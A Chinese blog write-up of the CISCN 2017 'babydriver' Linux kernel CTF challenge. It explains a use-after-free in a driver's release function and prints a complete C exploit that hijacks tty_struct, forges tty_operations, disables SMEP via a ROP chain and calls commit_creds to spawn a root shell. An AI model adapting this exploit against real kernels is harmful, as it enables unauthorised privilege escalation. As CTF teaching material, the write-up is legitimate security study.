Linux-4.4.72内核(uaf-tty_struct-babydriver)

已于 2022-04-11 22:57:44 修改
阅读量549 收藏
点赞数
分类专栏: pwn-kernel 文章标签: pwn
于 2022-04-11 22:34:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/124111523
版权

题目:2017 CISCN babydriver

附件文件

在这里插入图片描述

  • 给boot.sh加上-s调试参数
  • 解压rootfs.cpio后拿到./lib/modules/4.4.72/babydriver.ko漏洞文件
  • vmlinux-to-elf bzImage vmlinux得到vmlinux内核
  • 下面即可分析和编写exp了

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gjVT3sSR-1649687448618)(uaf-tty_struct-babydriver.assets/image-20220411211556090.png)]

分析

babydriver.ko放入IDA中进入到babydriver_init模块入口函数,简单分析如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tACQip8y-1649687448618)(uaf-tty_struct-babydriver.assets/image-20220407175802956-9682741.png)]

模块流程核心函数如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rpF0tSaR-1649687448619)(uaf-tty_struct-babydriver.assets/image-20220407191925053-9682741.png)]

babyopen函数:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fwrnJrfK-1649687448620)(uaf-tty_struct-babydriver.assets/image-20220407222610082.png)]

可以注意到参数分别是struct inode *inode, struct file *filp

inode结构存储有关文件和目录(文件夹)的信息,例如文件所有权、访问模式(读取、写入、执行权限)和文件类型。

file结构代表一个打开的文件。(它不特定于设备驱动程序;系统中每个打开的文件在struct file内核空间中都有一个关联。)直到最后一个close。在文件的所有实例都关闭后,内核释放数据结构

babyread:在这里插入图片描述

babywrite:
在这里插入图片描述

babyioctl:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NECKZ5v7-1649687448622)(uaf-tty_struct-babydriver.assets/image-20220407223230395.png)]

babyrelease函数:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B1JwkFTF-1649687448622)(uaf-tty_struct-babydriver.assets/image-20220407194501638.png)]

综上可知release函数存在一个uaf漏洞,ioctl函数可以重新分配指定大小的堆块

思路

这里利用uaf漏洞劫持tty_struct

/dev/ptmx是一种tty设备,tty设备被open的时候,会申请一个空间作为tty_struct定义如下:

struct tty_struct {
	int	magic;  //魔数  0x00005401   占4byte
	struct kref kref; //0x00000100  这个结构体最终指向typedef struct  --> int counter; 占4byte  
	struct device *dev; //占8byte
	struct tty_driver *driver;//占8byte
	const struct tty_operations *ops;   //目标指针 定义在下面
 	int index;

	/* Protects ldisc changes: Lock tty not pty */
	struct ld_semaphore ldisc_sem;
	struct tty_ldisc *ldisc;

	struct mutex atomic_write_lock;
	struct mutex legacy_mutex;
	struct mutex throttle_mutex;
	struct rw_semaphore termios_rwsem;
	struct mutex winsize_mutex;
	spinlock_t ctrl_lock;
	spinlock_t flow_lock;
  //........
}

0x005401就是tty_struct结构体的魔数,struct kref值为0x1000xffffffff81a74f80就是struct tty_operations指针

struct tty_operations结构体存了许多函数指针,在对此设备进行操作的时候,就会调用这里的函数指针,定义如下:

struct tty_operations {
	struct tty_struct * (*lookup)(struct tty_driver *driver,struct inode *inode, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	int  (*write_room)(struct tty_struct *tty);
	int  (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);
	long (*compat_ioctl)(struct tty_struct *tty,unsigned int cmd, unsigned long arg);
	void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
	void (*throttle)(struct tty_struct * tty);
	void (*unthrottle)(struct tty_struct * tty);
	void (*stop)(struct tty_struct *tty);
	void (*start)(struct tty_struct *tty);
  //。。。。。。
};

具体指令对应着相应的函数段,此时第八个指针也就是write函数的指针 -> 0x38处将它修改为ROP,在调用/dev/ptmx进程的write函数时即可进入ROP劫持程序执行流

首先就是常见的保存用户态环境,分别是cs、ss、sp、eflags寄存器将它们保存进全局变量便于后面取出,然后就是造成uaf劫持到tty_struct

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include<sys/ioctl.h>

#define TTY_STRUCT_SIZE  0x2e0  //gdb中 p sizeof(struct tty_struct)
#define POP_RDI 0xffffffff810d238d //: pop rdi ; ret
#define MOV_CR4_RDI 0xffffffff81004d80 //: mov cr4, rdi ; pop rbp ; ret
#define MOV_RSP_RAX 0xffffffff8181bfc5
#define POP_RAX 0xffffffff8100ce6e //: pop rax ; ret
#define SWAPGS 0xffffffff81063694 //: swapgs ; pop rbp ; ret
#define prepare_kernel_cred 0xffffffff810a1810 //通过gdb查看
#define commit_creds 0xffffffff810a1420

size_t user_cs,user_ss,user_sp,user_flags;
//size_t 32bit中4byte, 64bit中8byte

void staveStatus(){
    asm(
        "mov %cs , user_cs;"  //cs寄存器只能通过mov保存
        "mov %ss , user_ss;"
        "mov %rsp, user_sp;"
        "pushf;"
        "pop user_flags;"
        );
}
int main(){
    staveStatus();
    int fd1 = open("/dev/babydev",O_RDWR);  // alloc
    int fd2 = open("/dev/babydev",O_RDWR);  // alloc
    ioctl(fd1,0x10001,TTY_STRUCT_SIZE);  //realloc  #TTY_STRUCT_SIZE这个值可以通过gdb调试时 p sizeof(struct tty_struct)得到,必须要有符号表!
    close(fd1);   //free
    int tty_fd = open("/dev/ptmx",O_RDWR);   //uaf
}

断点在babywrite处在mov filp, cs:babydev_struct.device_buf后记录rdi的值(文件fd值),然后也就是单步调试到call _copy_from_user后面查看rdi的值如图:

可以看到已经成功拿到了tty_struct结构它的magic就是0x5401

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jpnMOJRl-1649687448623)(uaf-tty_struct-babydriver.assets/image-20220411213104306.png)]

我们知道tty_struct结构的第4个参数是tty_operations指针那么就可以在这里写入我们伪造的fake_tty_operations

将fd2的数据复制到我们的fake_tty_struct结构中,也可以手动设置数据,这里为了方便

size_t fake_tty_struct[4];
size_t fake_tty_operations[7];

read(fd2,fake_tty_struct,sizeof(fake_tty_struct)); //复制fd2的数据到伪造的tty结构体
fake_tty_struct[3] = &fake_tty_operations;//修改tty_operations指向我们的fake_tty_operations

write(fd2,fake_tty_struct,sizeof(fake_tty_struct)); //写入伪造的fake_tty_struct
write(tty_fd,"",1); //执行fake_tty_operations --> write

这里有个转换关系:写入的rop地址到栈中是一个双级指针格式如为(当前栈地址->rop链地址->gadget)

所以不能直接将rop地址写到第7个指针,通过放入rax -> rsp 取出二级地址执行

		size_t fake_tty_struct[4];
    size_t fake_tty_operations[7];
    size_t rop[0x10];
    int i = 0;
    rop[i++] = POP_RDI;
    rop[i++] = 0x6f0;
    rop[i++] = MOV_CR4_RDI;  //mov cr4, rdi /使得cr4 = 0x6f0
    rop[i++] = 0;  //pop rbp
    rop[i++] = &getRoot; //ret
    rop[i++] = SWAPGS; #切换
    rop[i++] = 0;
    rop[i++] = &intoUserStatus;

    memset(fake_tty_operations,'\x00',sizeof(fake_tty_operations));
    fake_tty_operations[7] = MOV_RSP_RAX; //会先执行tty_operations结构体中的write函数
    fake_tty_operations[0] = POP_RAX; //将下面rop的代码地址放入rax
    fake_tty_operations[1] = &rop;
    fake_tty_operations[2] = MOV_RSP_RAX; //执行rop流程
    
    read(fd2,fake_tty_struct,sizeof(fake_tty_struct)); //复制fd2的数据到伪造的tty结构体
    fake_tty_struct[3] = &fake_tty_operations;

    write(fd2,fake_tty_struct,sizeof(fake_tty_struct));
    write(tty_fd,"",1);

然后就是一些跳来跳去的gadget链,这里提权采用commit_creds(prepare_kernel_cred(NULL))方式进行提取权限和一些标准的提权流程

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cIzJS83E-1649687448624)(uaf-tty_struct-babydriver.assets/image-20220411215012307.png)]

完整exp

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include<sys/ioctl.h>

#define TTY_STRUCT_SIZE  0x2e0  //gdb中 p sizeof(struct tty_struct)
#define POP_RDI 0xffffffff810d238d //: pop rdi ; ret
#define MOV_CR4_RDI 0xffffffff81004d80 //: mov cr4, rdi ; pop rbp ; ret
#define MOV_RSP_RAX 0xffffffff8181bfc5
#define POP_RAX 0xffffffff8100ce6e //: pop rax ; ret
#define SWAPGS 0xffffffff81063694 //: swapgs ; pop rbp ; ret
#define prepare_kernel_cred 0xffffffff810a1810 //通过gdb查看
#define commit_creds 0xffffffff810a1420


size_t user_cs,user_ss,user_sp,user_flags;
//size_t 32bit中4byte, 64bit中8byte

void staveStatus(){
    asm(
        "mov %cs , user_cs;"  //cs寄存器只能通过mov保存
        "mov %ss , user_ss;"
        "mov %rsp, user_sp;"
        "pushf;"
        "pop user_flags;"
        );
}

void getRoot(){
    char* ((*pkc) (int)) = prepare_kernel_cred;
    void ((*cc)(char*))  = commit_creds;
    (*cc)((*pkc)(NULL));  //commit_creds(prepare_kernel_cred(NULL))
}

void getShell(){
  execl("/bin/sh","sh",NULL);
}
void intoUserStatus(){
    asm(
        "push %0;"
        "push %1;"
        "push %2;"
        "push %3;"
        "push %4;"
        "iretq;"
        :
        : "r"(user_ss),"r"(user_sp) ,"r"(user_flags) ,"r"(user_cs), "r"(&getShell)
        );
    //rop[i++] = IRETQ;  //这里发现gadget 中没有这个指令 所以手写asm
}
int main(){
    staveStatus();
    int fd1 = open("/dev/babydev",O_RDWR);  // alloc
    int fd2 = open("/dev/babydev",O_RDWR);  // alloc
    ioctl(fd1,0x10001,TTY_STRUCT_SIZE);  //realloc
    close(fd1);   //free
    int tty_fd = open("/dev/ptmx",O_RDWR);   //uaf


    size_t fake_tty_struct[4];
    size_t fake_tty_operations[7];
    size_t rop[0x10];
    int i = 0;
    rop[i++] = POP_RDI;
    rop[i++] = 0x6f0;
    rop[i++] = MOV_CR4_RDI;  //mov cr4, rdi /使得cr4 = 0x6f0
    rop[i++] = 0;  //pop rbp
    rop[i++] = &getRoot; //ret
    rop[i++] = SWAPGS;
    rop[i++] = 0;
    rop[i++] = &intoUserStatus;
  
    memset(fake_tty_operations,'\x00',sizeof(fake_tty_operations));
    fake_tty_operations[7] = MOV_RSP_RAX; //会先执行tty_operations结构体中的write函数
    fake_tty_operations[0] = POP_RAX; //将下面rop的代码地址放入rax
    fake_tty_operations[1] = &rop;
    fake_tty_operations[2] = MOV_RSP_RAX; //执行rop流程
    //mov_rsp_rax -> pop_rax -> mov_rsp_rax -> rop
    //这里有个转换关系:写入的rop地址到栈中是一个双级指针格式如为(当前栈地址->rop链地址->gadget)
    //所以不能直接将rop地址写到第7个指针,通过放入rax -> rsp 取出二级地址执行

    read(fd2,fake_tty_struct,sizeof(fake_tty_struct)); //复制fd2的数据到伪造的tty结构体
    fake_tty_struct[3] = &fake_tty_operations;

    write(fd2,fake_tty_struct,sizeof(fake_tty_struct));
    write(tty_fd,"",1);

    return 0;
}

成功获取root权限

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6Hw2ptSZ-1649687448625)(uaf-tty_struct-babydriver.assets/image-20220411215316660.png)]

HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
使用uaf42设计的有源滤波器,高通滤波器的设计参数记录
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二因子提供给最终用户,减少对密码的依赖。密码可以简单到仅有4个数字。最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
xfrm_poc:Linux内核XFRM UAF POC(3.x-5.x内核
03-12
Linux内核3.x-5.x XFRM UAF PoC 这是去年报告的。 CentOS是2020年1月修补该错误的最后一个发行版。 技术报告在这里 在以下发行版中,应在构建日期为2019年7月至11月之前的所有内核上工作: Ubuntu 14.04 / 16.04 Server 4.4 LTS内核 CentOS 8 4.18内核 红帽企业Linux 8 4.18内核 Ubuntu 18.04 Server LTS 4.15内核 在以下情况下,其他发行版可能会受到影响: 允许非特权的用户名空间 xfrm支持在其中编译或可以自动加载 补丁没有被反向移植 要赢得比赛,可能需要几次尝试(有时超过10次尝试),因此请像下面这样循环运行: $ while :; do ./lucky0 -q && break; done 成功后,当前用户无需密码即可添加到/ etc / sudoers中。
fido-uaf-v1.0-ps-20171208-cn-pass.rar_IFAA_fido specification_中文
09-15
FIDO生物识别技术中文规范: 1.FIDO UAF 架构概览 v1.0.pdf 2.FIDO 术语表 v1.0.pdf 3.FIDO UAF 协议规范 v1.0.pdf 4.FIDO UAF 应用API和传输绑定规范 v1.0.pdf 5.FIDO UAF 认证器控制命令 v1.0.pdf 6.FIDO UAF 认证器特定模块API v1.0.pdf 7.FIDO UAF 认证器元数据声明 v1.0.pdf 8.FIDO UAF 认证器元数据服务 v1.0.pdf 9.FIDO UAF 预定义值的注册表 v1.0.pdf 10.FIDO 应用标识符与类型规范 v1.0.pdf 11.FIDO 安全参考v1.0.pdf
Linux-Kernal-Exploits-m-:Linux内核漏洞
05-17
Linux内核漏洞 简介 Linux内核漏洞 进攻清单 #CVE#描述#内核 [glibc] (glibc <= 2.26) [Sudo] (须藤1.8.6p7-1.8.20) [由于UFO到非UFO路径切换而导致的内存损坏] [由BPF验证程序引起的内存损坏]( 之前Linux内核) [Netlink套接字子系统中的UAF – XFRM](4.13.11之前Linux内核) [Samba远程执行] (Samba 3.5.0-4.6.4 / 4.5.10 / 4.4.14) [AF_PACKET套接字中的签名问题] (Linux内核通过4.10.6版) [DCCP协议中的双重释放] (Linux内核至4.9.11) ['waitid()'] (内核4.14.0-rc4 +) [SO_SNDBUFFORCE和SO_RCVBUFFORCE套接字选项的签名问
linux内核申请堆,linux kernel pwn学习之UAF
weixin_29832179的博客
04-30 259
Linux Kernel UAF与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。为了加深理解,我们就以一题为例ciscn2017_baby...
linux 4.4内核特性,Linux内核4.4版本带来的网络新特性
weixin_34651473的博客
05-02 443
本文题目有点大,但其实我只想描述一些我个人一直比较关注的特性,并且不会太详细,跟往常一样,主要是帮忙理清思路的,不会分析源码。这主要是为了哪一天突然忘了的时候,一目十行扫一眼就能记忆当时的理解,不然写的太细节了,自己都看不懂了。Lockless TCP listener先从TCP的syncookie说起,如果都能使用syncookie机制该有多好,但是不能,因为它会丢失很多选项协商信息,这些信息对...
kernel-pwn学习(2)--kernel uaf&&CISCN2017 - babydriver
azraelxuemo的博客
04-20 621
文章目录CISCN2017 - babydriver CISCN2017 - babydriver 题目附件 这道题目由于不需要利用ROP构造,所以也不需要通过vmlinux来获得gadget
linux kernal pwn STARCTF 2019 hackme(二)劫持tty_struct ioctl && 劫持tty_struct write
yongbaoii的博客
04-20 366
承接上文
linux kernel pwn学习之伪造tty_struct执行任意函数
seaaseesa的博客
02-29 1879
Linux Kernel伪造tty_struct执行任意函数 当用户打开ptmx驱动时,会分配一个tty_struct结构,它的结构如下 structtty_struct{ intmagic; structkrefkref; structdevice*dev; structtty_driver*driver; ...
CISCN 2017 babydriver uaf做法
weixin_46483787的博客
04-12 1534
本来是在学IOT和fuzz,但是比赛中经常出现kernel题,我们又没人会做,没有办法只好我来学了·····(一万个抗拒) 这可能是大部分人的第一道kernel题吧hhhhh 虽然在新的内核版本中此文的UAF做法已经失效,但是对于初学者来说,此题非常适合理解kernel题目的攻击流程 拿到题目先解压,提取文件系统: mkdir rootfs mv rootfs.cpio ./rootfs/rootfs.cpio.gz cd rootfs gunzip rootfs.cpio.gz cpio -idmv &l
串口的open操作(tty_open)
热门推荐
月出皎兮。 佼人僚兮。 舒窈纠兮。 劳心悄兮。
08-23 1万+
根据前面的操作,串口作为字符驱动也已经注册到系统了,/dev目录下也有设备文件节点了。 那接下来uart的操作是如何进行的呢? 操作硬件之前都是要先open设备,先来分析下这里的open函数具体做了那些工作(做了大量工作 ,真的!)。 应用层通过open系统调用open(“/dev/s3c2410_serial0”,)一层一层调用到会调用到tty_open。 因为串口在linux下是作为t
接触内核pwnbabydriver
csdn546229768的博客
04-11 1002
文章目录分析思路保护gdb调试exp利用整体思路如下: 分析 拿到babydriver题目附件后得到的文件如下: 发现运行内核就报错,内容如下: Could not access KVM kernel module: No such file or directory qemu-system-x86_64: failed to initialize KVM: No such file or directory 未能初始化kvm,大概率是因为系统不支持虚拟化,具体可通过如下命令查看是否支持 egrep '^
kernel_uaf
令则
02-14 208
kernel uaf 文章目录kernel uaf分析漏洞利用struct creduaf利用exp 分析 解包得到babydriver.ko文件, 这里其实有点奇怪,关于驱动文件我们要明白,他是常驻内核态的, 我们的程序打开这个文件描述符和读写关闭等操作会转入到这个驱动对应的函数内,我们编写用户态程序进行操作,其实是类似于我们直接去调用这些函数的。其中对应关系, 具体的关系一般要查看 data段的 file_operations, 这里说下一般遇到的常见命名方式。 open(“driver_name
钢筋混凝土污水池及提升泵站施工方案.doc
05-03
课程设计污水处理
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
05-03
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
node-v12.22.10-linux-armv7l.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
The Experiment 3 of Engineering Electromagnetics.pdf
最新发布
05-03
The Experiment 3 of Engineering Electromagnetics.pdf
node-v12.11.0-darwin-x64.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
CVE-2016-0728
08-03
回答: CVE-2016-0728是一个存在于Linux平台上的UAF漏洞。该漏洞主要是由于keyrings组件中的引用计数问题导致的。在计数器溢出时没有进行合理的处理,当对象的引用计数达到最大值时会变为0,但程序仍然保留对引用对象的引用,从而形成了UAF漏洞。[2]在Linux内核中,驱动器使用keyring功能来保存或缓存安全数据、认证密钥、加密密钥等信息。通过keyctl接口,用户空间中的程序可以管理相应的对象,并使用这一机制来满足不同程序所需实现的不同功能。[3]关于CVE-2016-0728的更多信息可以参考参考文章中提供的链接。[1]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值